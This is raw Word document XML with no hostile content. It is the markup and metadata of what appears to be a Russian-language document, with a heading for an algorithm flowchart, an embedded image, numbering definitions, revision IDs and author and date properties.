    <w:p w14:paraId="69299651" w14:textId="77777777" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="005C3FCC" w:rsidP="005C3FC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Блок-схема алгоритма</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6DF998A4" w14:textId="77777777" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="005C3FCC" w:rsidP="005C3FCC"/>
    <w:p w14:paraId="2D29D9D9" w14:textId="7769B828" w:rsidR="00F0157F" w:rsidRPr="009722AB" w:rsidRDefault="005C3FCC" w:rsidP="005C3FCC">
      <w:pPr>
        <w:spacing w:after="0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13F9364" wp14:editId="5BC8D533">
            <wp:extent cx="5616892" cy="3744595"/>
            <wp:effectExtent l="19050" t="19050" r="22225" b="27305"/>
            <wp:docPr id="645808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0863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892" cy="374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0157F" w:rsidRPr="009722AB" w:rsidSect="009A0B1E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6BB13" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1E" w:rsidP="00A42E8A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A4145F8" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1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D981C" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1E" w:rsidP="00A42E8A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E15AB00" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1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4113">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="627250028">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="236984459">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2095317950">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="177813963">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1920095948">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1497769180">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1429546441">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="272710428">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1336299342">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2041860297">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1886984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703"/>
    <w:rsid w:val="00010F8A"/>
    <w:rsid w:val="000155B0"/>
    <w:rsid w:val="00022D4E"/>
    <w:rsid w:val="00055294"/>
    <w:rsid w:val="00056E35"/>
    <w:rsid w:val="000577C6"/>
    <w:rsid w:val="00061996"/>
    <w:rsid w:val="00093F72"/>
    <w:rsid w:val="000A147C"/>
    <w:rsid w:val="000B5E22"/>
    <w:rsid w:val="000D1A00"/>
    <w:rsid w:val="000D4CFD"/>
    <w:rsid w:val="000E0037"/>
    <w:rsid w:val="000F46B5"/>
    <w:rsid w:val="000F60C4"/>
    <w:rsid w:val="00102ACB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279E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C3FC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040C"/>
    <w:rsid w:val="00711223"/>
    <w:rsid w:val="00726386"/>
    <w:rsid w:val="00726C4E"/>
    <w:rsid w:val="007320FE"/>
    <w:rsid w:val="00737868"/>
    <w:rsid w:val="00745238"/>
    <w:rsid w:val="00747CD9"/>
    <w:rsid w:val="007605C8"/>
    <w:rsid w:val="0076436D"/>
    <w:rsid w:val="007B2335"/>
    <w:rsid w:val="007B7221"/>
    <w:rsid w:val="007D0589"/>
    <w:rsid w:val="007D2D70"/>
    <w:rsid w:val="007E12C3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722AB"/>
    <w:rsid w:val="009817A2"/>
    <w:rsid w:val="0099290E"/>
    <w:rsid w:val="009A0752"/>
    <w:rsid w:val="009A0B1E"/>
    <w:rsid w:val="009A4278"/>
    <w:rsid w:val="009A71D2"/>
    <w:rsid w:val="009B10F7"/>
    <w:rsid w:val="009B22A2"/>
    <w:rsid w:val="009C5940"/>
    <w:rsid w:val="009D3767"/>
    <w:rsid w:val="009E160A"/>
    <w:rsid w:val="009F0AE7"/>
    <w:rsid w:val="00A01A69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5B7"/>
    <w:rsid w:val="00A66EFF"/>
    <w:rsid w:val="00A74EB1"/>
    <w:rsid w:val="00A75274"/>
    <w:rsid w:val="00A77013"/>
    <w:rsid w:val="00A772FF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27CC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DD1946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Александр Скворцов</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2023-09-14T21:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-29T10:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-29T10:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>